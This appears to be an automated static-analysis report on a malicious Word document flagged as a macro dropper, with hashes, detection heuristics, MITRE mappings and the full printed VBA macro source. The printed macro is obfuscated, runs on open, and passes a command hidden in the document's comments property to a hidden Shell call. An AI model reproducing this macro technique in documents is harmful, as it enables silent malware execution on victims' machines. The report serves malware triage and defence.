Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2747932c56b816aa…

MALICIOUS

Office (OLE)

Size: 74.0 KB
Created: 2017-10-06 21:24:00
Authoring application: Microsoft Office Word
First seen: 2017-10-10
MD5: 1a4471c427c7b4d87f3edf0c150e4c89
SHA-1: 3c41291459807bfbe05fe9b7c1c40e6a2ab97cd7
SHA-256: 2747932c56b816aae80ace812975e868b3227ab651903c1dc01e987231cccc96
Risk Score: 172

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. A critical heuristic fired on a potential Shell call within the VBA code, and legacy WordBasic auto-exec markers (autoopen) were detected. The extracted 'macros.bas' file and the critical heuristic together suggest the macro is designed to execute a command, most likely to download and run a secondary payload, which is consistent with dropper malware behavior.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6340624-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6340624-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0
    RUtyUCDcc = 72 + 84 + 68 + 80 + 64 + 86 + 68 + 94 + 89 + 92 + 69 + 56 + 97 + 82
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
    Sub autoopen()
    avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9097 bytes
SHA-256: b638b5c5245aa23762bc5b61b94655eaf41a8fc006ef47c578af98297da2f867
Detection
ClamAV: No threats found
Obfuscation or payload: likely
76 of 99 identifiers look randomly generated (e.g. 'tFFBpbzEVBD') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function SMUpGxrua()
LfMsXThHP = 92 + 59 + 62 + 89 + 60 + 99 + 99 + 64 + 61 + 67 + 58 + 57 + 100 + 76 + 76 + 66 + 63 + 81 + 83 + 63 + 87
 NbMrrVRfYWR = 73 + 65 + 98 + 71 + 73 + 92 + 63 + 94 + 59 + 89 + 91 + 81 + 64 + 67 + 93 + 57 + 59 + 62
 xkwmzNnXW = 66 + 59 + 57 + 75 + 74 + 93 + 61 + 99 + 64 + 58 + 76 + 63 + 65 + 79 + 89 + 90 + 100 + 98 + 77
 BsBvVKDNDsa = 55 + 86 + 80 + 73 + 79 + 99 + 76 + 98 + 83 + 55 + 93 + 55 + 76
 CDDGGCnFg = 79 + 58 + 78 + 57 + 89 + 70 + 87 + 81 + 78 + 83 + 72 + 82 + 95 + 100 + 84 + 99 + 99 + 95 + 92 + 73 + 96
 UapYHPb = 65 + 95 + 59 + 97 + 89 + 79 + 73 + 71 + 89 + 60 + 98 + 96 + 58 + 84 + 89 + 88 + 55

hMxfPTvZXC = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + " "
xyySnxUwWh = 75 + 92 + 88 + 97 + 59 + 93 + 64 + 65 + 85 + 59 + 88 + 61 + 95 + 75 + 99 + 56 + 62 + 96 + 92 + 63
 bnPwxmSzTH = 63 + 84 + 83 + 70 + 99 + 74 + 70 + 56 + 75 + 93 + 95 + 77 + 91 + 72 + 89 + 67 + 68 + 77 + 83 + 68 + 72 + 73
 pgkyPdxc = 66 + 62 + 83 + 96 + 98 + 64 + 69 + 85 + 77 + 73 + 76 + 89 + 81 + 78 + 68 + 66 + 58 + 97 + 60 + 82 + 70 + 62
 gRWHnrEt = 72 + 74 + 87 + 80 + 78 + 75 + 100 + 63 + 99 + 56 + 61 + 81 + 55 + 90 + 58
 RfVrhVuA = 77 + 77 + 78 + 67 + 61 + 69 + 90 + 93 + 80 + 76 + 71 + 85 + 80 + 86 + 99 + 80 + 88

Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0
RUtyUCDcc = 72 + 84 + 68 + 80 + 64 + 86 + 68 + 94 + 89 + 92 + 69 + 56 + 97 + 82
 FMsaKtzT = 82 + 60 + 64 + 77 + 68 + 67 + 65 + 60 + 58 + 87 + 95 + 57 + 94 + 69 + 62 + 77 + 85 + 88 + 99 + 95 + 80 + 57
 AGdDUfwr = 73 + 77 + 78 + 82 + 65 + 68 + 59 + 88 + 62 + 86 + 85 + 64 + 68 + 100 + 100 + 62
 FPhrazsVz = 92 + 57 + 92 + 59 + 61 + 71 + 83 + 63 + 96 + 93 + 100 + 76 + 91 + 95 + 65 + 85 + 64 + 94 + 77 + 72 + 84 + 66
 mMtWDypM = 83 + 89 + 61 + 81 + 55 + 78 + 82 + 59 + 88 + 76 + 60 + 100 + 77 + 67 + 85 + 88 + 63 + 70 + 82 + 81 + 67 + 66

End Function
Function TxxdszysVP()
kELBCRvxK = 98 + 82 + 93 + 80 + 75 + 99 + 96 + 98 + 99 + 59 + 66 + 76 + 99 + 86 + 68 + 97 + 55 + 98 + 88 + 86 + 55 + 82 + 79
 FdpkpHT = 66 + 83 + 96 + 70 + 97 + 68 + 83 + 97 + 99 + 59 + 76 + 55 + 61 + 94 + 56 + 91 + 63 + 71 + 58 + 66 + 76 + 64 + 63 + 78 + 57 + 88
 UbPUYpBKgp = 79 + 78 + 69 + 55 + 73 + 97 + 70 + 75 + 65 + 78 + 92 + 93 + 92 + 71 + 66 + 95 + 90 + 99 + 63 + 78 + 97 + 74
 TsPEutAZ = 69 + 89 + 55 + 86 + 56 + 71 + 96 + 74 + 87 + 74 + 94 + 88 + 59 + 89 + 88 + 97 + 68 + 68 + 95 + 68 + 81 + 67 + 74 + 69 + 61 + 61
 tMFRXUCsufw = 83 + 88 + 86 + 89 + 91 + 63 + 61 + 87 + 92 + 70 + 80 + 62 + 87 + 100 + 57 + 64 + 72 + 74 + 67
 ytcRXpt = 58 + 97 + 86 + 70 + 100 + 87 + 59 + 93 + 77 + 97 + 56 + 73 + 88 + 93 + 59 + 77 + 71 + 75 + 56 + 98 + 99 + 65 + 75 + 64

AKMnVPdkUnv = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "comme" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "nts" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + cYwdSEuMaLm
PKHEvBdfFNg = 96 + 73 + 95 + 63 + 93 + 60 + 90 + 89 + 58 + 61 + 83 + 86 + 57 + 68 + 71 + 79
 payrRwDY = 71 + 66 + 91 + 74 + 86 + 83 + 69 + 80 + 88 + 92 + 92 + 78 + 92 + 63 + 95 + 86 + 60 + 93 + 78 + 86
 SCtxvMwZHXH = 77 + 98 + 70 + 86 + 86 + 71 + 70 + 60 + 99 + 76 + 57 + 82 + 70 + 61 + 100 + 91 + 89 + 80 + 86 + 91 + 89 + 87 + 93
 aabLxWv = 68 + 61 + 73 + 92 + 99 + 72 + 68 + 88 + 63 + 75 + 80 + 90 + 92 + 96 + 83 + 98 + 68 + 80 + 56 + 79 + 59 + 60 + 64 + 67 + 67
 RxNcSut = 94 + 71 + 96 + 75 + 81 + 62 + 93 + 84 + 97 + 86 + 97 + 87 + 86 + 91 + 72 + 97 + 62 + 90 + 81 + 95 + 72
 DTmLCTawM = 61 + 68 + 72 + 70 + 72 + 94 + 56 + 71 + 69 + 70 + 80 + 93 + 69 + 76 + 96 + 84 + 98 + 71
 TFNMbKCMy = 72 + 78 + 78 + 98 + 72 + 87 + 89 + 83 + 63 + 60 + 99 + 94 + 67 + 99 + 75 + 93 + 76 + 72 + 93 + 95 + 58 + 67 + 87

TxxdszysVP = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + XZUsuxuC
FLrMuYmra = 57 + 60 + 74 + 61 + 73 + 76 + 71 + 89 + 61 + 99 + 99 + 78 + 90 + 90 + 61 + 91 + 81
 SnwwedTTXTe = 80 + 93 + 55 + 89 + 64 + 90 + 99 + 70 + 64 + 85 + 62 + 98 + 59 + 78 + 87 + 67 + 80 + 79 + 70
 cNXfbNEa = 84 + 70 + 88 + 57 + 93 + 100 + 84 + 84 + 59 + 83 + 60 + 82 + 83 + 89 + 83 + 93 + 69 + 79
 dsSgEZArZF = 79 + 55 + 83 + 95 + 95 + 83 + 75 + 98 + 71 + 74 + 89 + 66 + 66 + 78 + 69 + 89 + 83 + 66 + 56 + 81 + 81 + 81 + 90 + 68 + 92 + 69 + 76 + 97 + 67 + 87 + 99 + 97
 fTDGbCuF = 95 + 77 + 76 + 99 + 78 + 100 + 56 + 85 + 88 + 56 + 71 + 84 + 75 + 90 + 92 + 59 + 56 + 85 + 97 + 98 + 96 + 65 + 56 + 87 + 83 + 83
 uwSZRfndptx = 72 + 60 + 65 + 70 + 98 + 61 + 79 + 93 + 61 + 56 + 71 + 72 + 68
 mmvcBCyBBzt = 60 + 73 + 73 + 85 + 81 + 57 + 95 + 98 + 98 + 74 + 67 + 68 + 85 + 66 + 95 + 69 + 77

End Function
Sub DyEAfVFbGY()
awVtxsHKD = 99 + 83 + 81 + 67 + 84 + 63 + 92 + 86 + 78 + 95 + 77 + 90 + 83 + 79 + 56 + 95 + 76 + 94 + 57 + 100 + 98 + 55 + 98 + 91 + 80 + 76
 CdMUTGvdZA = 91 + 70 + 86 + 69 + 64 + 84 + 55 + 77 + 95 + 85 + 68 + 83 + 93 + 60 + 87 + 87 + 90 + 85 + 84 + 60 + 95 + 71
 zFpNNCLkUN = 91 + 92 + 89 + 81 + 71 + 82 + 69 + 63 + 68 + 94 + 80 + 64 + 56 + 85 + 86 + 80 + 64 + 72 + 86 + 79
 fesdZwvFv = 61 + 56 + 97 + 93 + 93 + 80 + 97 + 84 + 89 + 91 + 82 + 100 + 88 + 55 + 100 + 84 + 59 + 71 + 97 + 77 + 83
 uPGcDGvc = 67 + 80 + 94 + 55 + 55 + 68 + 92 + 58 + 70 + 73 + 90 + 55 + 92 + 71 + 56 + 98 + 99 + 69 + 67 + 78 + 75
 yTWGrtDcV = 86 + 73 + 81 + 69 + 82 + 75 + 88 + 65 + 87 + 74 + 59 + 76 + 82 + 84 + 71 + 89

SMUpGxrua
TsbVezpFSNr = 60 + 91 + 86 + 97 + 65 + 64 + 63 + 89 + 62 + 94 + 71 + 62 + 99
 XaXbzbhtAt = 86 + 58 + 81 + 58 + 63 + 69 + 56 + 85 + 87 + 80 + 92 + 92 + 67 + 70 + 74 + 74 + 62 + 61
 LzHDDZvS = 98 + 88 + 62 + 57 + 80 + 63 + 86 + 96 + 60 + 80 + 65 + 58 + 59 + 81 + 86 + 67 + 82 + 63 + 90 + 58
 mMEFwvcUTBk = 62 + 85 + 55 + 84 + 71 + 79 + 82 + 73 + 72 + 94 + 87 + 61 + 72 + 86 + 86 + 83 + 84 + 90 + 81 + 70 + 68 + 60 + 96 + 60 + 77 + 79 + 56
 mxhmNKASgr = 99 + 100 + 88 + 78 + 55 + 74 + 86 + 61 + 72 + 96 + 91 + 87 + 79 + 68 + 75 + 85 + 59 + 64 + 77
 VKhhVxYwDss = 63 + 72 + 100 + 78 + 73 + 79 + 60 + 90 + 92 + 90 + 92 + 78 + 88 + 94 + 83 + 99 + 83 + 91 + 85 + 56 + 64 + 85 + 66 + 69 + 100 + 98
 uLypGEaw = 100 + 58 + 77 + 97 + 79 + 92 + 85 + 99 + 99 + 91 + 75 + 82 + 98 + 85 + 93 + 98

End Sub
Sub autoopen()
avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
 XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72
 epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81
 tzyGYTAbft = 69 + 84 + 83 + 96 + 58 + 97 + 55 + 77 + 58 + 55 + 75 + 84 + 82 + 92 + 68 + 57 + 93 + 85 + 95 + 95 + 59
 ynpsKeY = 60 + 65 + 89 + 78 + 87 + 86 + 95 + 68 + 76 + 62 + 67 + 69 + 91 + 99 + 98 + 80 + 76 + 82 + 67 + 85 + 94 + 79 + 68 + 65 + 95
 HrgnxUf = 61 + 63 + 65 + 74 + 73 + 64 + 98 + 63 + 88 + 64 + 60 + 66 + 83 + 86 + 59 + 88 + 58 + 79

DyEAfVFbGY
tFFBpbzEVBD = 95 + 85 + 64 + 83 + 63 + 82 + 81 + 91 + 86 + 62 + 87 + 82 + 72 + 98 + 84 + 82 + 67 + 80 + 74 + 87 + 92 + 83 + 92 + 59 + 90 + 79 + 79
 wWxbdvzHZu = 84 + 64 + 97 + 72 + 75 + 62 + 88 + 96 + 73 + 69 + 100 + 69 + 76 + 76 + 77 + 98 + 72 + 73 + 84 + 96 + 81 + 97 + 97 + 89
 UwkSNDsM = 94 + 74 + 67 + 78 + 65 + 60 + 60 + 84 + 88 + 60 + 59 + 64 + 89 + 91 + 69 + 80 + 66
 rBfuFxXEn = 100 + 80 + 91 + 62 + 89 + 90 + 92 + 98 + 62 + 66 + 70 + 66 + 95 + 58 + 71 + 78 + 55 + 62
 ZNZYbtVGX = 65 + 65 + 73 + 90 + 88 + 56 + 88 + 65 + 77 + 97 + 79 + 80 + 66 + 65 + 81 + 75 + 100 + 100 + 91 + 57 + 75 + 88 + 82 + 60 + 73
 NDwLRskNRm = 99 + 68 + 74 + 95 + 60 + 56 + 96 + 79 + 70 + 70 + 56 + 79 + 95 + 61 + 88 + 83 + 63
 VCLfrCtNZC = 79 + 62 + 59 + 99 + 74 + 87 + 56 + 68 + 87 + 81 + 69 + 55 + 89 + 91 + 95 + 75 + 94 + 61 + 59 + 66

End Sub